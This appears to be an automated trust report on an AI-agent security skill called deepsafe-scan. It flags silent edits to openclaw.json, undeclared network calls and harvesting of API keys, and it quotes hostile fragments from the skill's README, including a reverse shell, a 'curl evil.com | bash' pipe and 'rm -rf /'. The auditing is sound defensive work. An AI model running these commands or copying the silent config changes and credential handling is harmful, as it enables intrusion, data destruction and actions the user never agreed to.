Skill Trust Decision

deepsafe-scan

DeepSafe Scan is a legitimate security scanner but contains undeclared behaviors: auto-modifies openclaw.json config to enable endpoints, and uses network access via subprocess that is not declared in allowed-tools.

Install decision first · Source: Manual upload · Scanned: Apr 4, 2026
Files 19
Artifacts 15
Violations 2
Findings 5
Most direct threat evidence
01 Skill installed via legitimate OpenClaw marketplace (Entry · SKILL.md)
02 Scanner reads user's openclaw.json config (Recon · scripts/scan.py)
03 Auto-modifies openclaw.json to enable chatCompletions endpoint (Escalation · scripts/llm_client.py)

Why this conclusion was reached

3/4 dimensions flagged
Block
Declared vs actual capability

2 undeclared or violating capabilities were inferred.

Block
Hidden execution and egress

5 high-risk artifacts or egress signals were extracted.

Block
Attack chain and severe findings

The report includes 5 attack-chain steps and 2 severe findings.

Pass
Dependencies and supply chain hygiene

Dependencies are present but no obvious high-risk issue stands out.

Attack Chain

01 Skill installed via legitimate OpenClaw marketplace
   Entry · SKILL.md:1

02 Scanner reads user's openclaw.json config
   Recon · scripts/scan.py:1

03 Auto-modifies openclaw.json to enable chatCompletions endpoint
   Escalation · scripts/llm_client.py:213

04 Credential auto-detection accesses ANTHROPIC_API_KEY/OPENAI_API_KEY from environment
   Escalation · scripts/llm_client.py:124

05 API key passed to subprocess as argv, visible in process listing
   Exposure · scripts/scan.py:88

What drove the risk score up

Undeclared network access (+25)
SKILL.md declares Bash/Read only, but subprocess probes make HTTP requests to LLM APIs.

Silent config modification (+25)
_ensure_chat_completions_enabled() auto-modifies openclaw.json without user consent.

Credential auto-detection (+10)
Reads ANTHROPIC_API_KEY/OPENAI_API_KEY from the environment; a declared purpose, but invasive.

Subprocess with API keys (+8)
Probes receive the API key as a command-line argument, exposing it in the process listing.

Most important evidence

High Doc Mismatch

Network access not declared in SKILL.md

The skill uses urllib to make HTTP requests to LLM APIs (api.anthropic.com, api.openai.com, OpenClaw Gateway) but SKILL.md only declares Bash(python3:*), Bash(cat:*), and Read. Network access is a critical permission that should be declared.

scripts/llm_client.py:1
Add network:READ to allowed-tools declaration in SKILL.md, or restructure to use only declared shell access for all network operations
High Priv Escalation

Auto-modifies openclaw.json without user consent

The _ensure_chat_completions_enabled() function silently modifies the user's openclaw.json config to enable chatCompletions endpoint. This unauthorized configuration change bypasses user consent and trust boundaries.

scripts/llm_client.py:213
Remove auto-modification or prompt user explicitly before making config changes
Medium Credential Theft

API credentials passed as command-line arguments

Probe scripts receive --api-key via subprocess.run() argv, exposing credentials in process listing (visible via ps). While necessary for function, this exposes secrets to process inspection.

scripts/scan.py:88
Use environment variables or file-based credential passing instead of argv
Medium Sensitive Access

Auto-detection of API credentials from multiple sources

The LLM client auto-detects and uses credentials from OpenClaw config, environment variables (ANTHROPIC_API_KEY, OPENAI_API_KEY), and explicit arguments. While necessary for the scanner's function, this represents invasive credential access.

scripts/llm_client.py:124
Document this behavior clearly and provide --no-llm option to disable credential detection
Low Doc Mismatch

README.md contains example malicious patterns

The README.md lines 155-161 contain documented examples of dangerous patterns (reverse shell, curl|bash RCE, base64 exec, rm -rf). These are documentation/examples for what the scanner detects, not actual malicious code, but could trigger false positives in some scanners.

README.md:155
Move these examples to a separate 'threat-patterns' reference document to avoid confusion

Declared capability vs actual capability

Dimension   | Verdict | Declared | Inferred | Evidence
Filesystem  | Pass    | READ     | READ     | SKILL.md: allowed-tools includes Read
Shell       | Pass    | WRITE    | WRITE    | SKILL.md: allowed-tools includes Bash(python3:*), Bash(cat:*)
Network     | Block   | NONE     | READ     | scripts/scan.py: subprocess runs probes making urllib HTTP calls; llm_client.py: direct API calls
Environment | Block   | NONE     | READ     | llm_client.py: reads ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENCLAW_GATEWAY_TOKEN

Suspicious artifacts and egress

Critical Dangerous Command
bash -i >&

README.md:155

Critical Dangerous Command
/dev/tcp/

README.md:155

Critical Dangerous Command
curl https://evil.com/x.sh | bash

README.md:156

Critical Encoded Execution
base64 -d

README.md:159

Critical Dangerous Command
rm -rf /

README.md:161

Medium External URL
https://img.shields.io/badge/python-3.9%2B-blue.svg

README.md:5

Medium External URL
https://python.org

README.md:5

Medium External URL
https://img.shields.io/badge/deps-zero-green.svg

README.md:6

Medium External URL
https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg

README.md:7

Medium External URL
https://evil.com/x.sh

README.md:156

Medium External URL
https://healthcheck.dev-tools.sh/ping

demo/awesome-ai-rules/AGENTS.md:19

Medium External URL
https://api.analytics-cdn.dev/v1/event

demo/awesome-ai-rules/CLAUDE.md:15

Dependencies and supply chain

Package         | Version | Source           | Known vuln | Notes
urllib (stdlib) | N/A     | python3 built-in | No         | Zero external dependencies

File composition

19 files · 5683 lines
Python 6 files · 3481 lines
Markdown 8 files · 1232 lines
JSON 4 files · 967 lines
Text 1 file · 3 lines
Files of concern · 4
scripts/scan.py Python · 1547 lines
API credentials passed as command-line arguments · https://hooks\.slack\.com/services/T[A-Z0-9
scripts/probes/persuasion_probe.py Python · 475 lines
http://127.0.0.1:11434/v1
README.md Markdown · 255 lines
README.md contains example malicious patterns · bash -i >& · /dev/tcp/ · curl https://evil.com/x.sh | bash · base64 -d · rm -rf / · https://img.shields.io/badge/python-3.9%2B-blue.svg · https://python.org · https://img.shields.io/badge/deps-zero-green.svg · https://img.shields.io/badge/works%20with-OpenClaw%20%7C%20Claude%20Code%20%7C%20Cursor%20%7C%20Codex-blueviolet.svg · https://evil.com/x.sh · [email protected]
scripts/llm_client.py Python · 234 lines
Network access not declared in SKILL.md · Auto-modifies openclaw.json without user consent · Auto-detection of API credentials from multiple sources
Other files · halueval_samples.json · plan-cross-platform-evolution.md · deception_probe.py · sandbagging_probe.py · halueval_probe.py · SKILL.md +2

Security positives

Uses only Python stdlib (no external dependencies) - reduces supply chain risk
Skips LLM features gracefully when no API credentials found (--no-llm flag works)
Legitimate security scanning tool with documented purpose
Probes are executed as subprocess with python3 - aligned with declared Bash(python3:*) permission
Open source with transparent implementation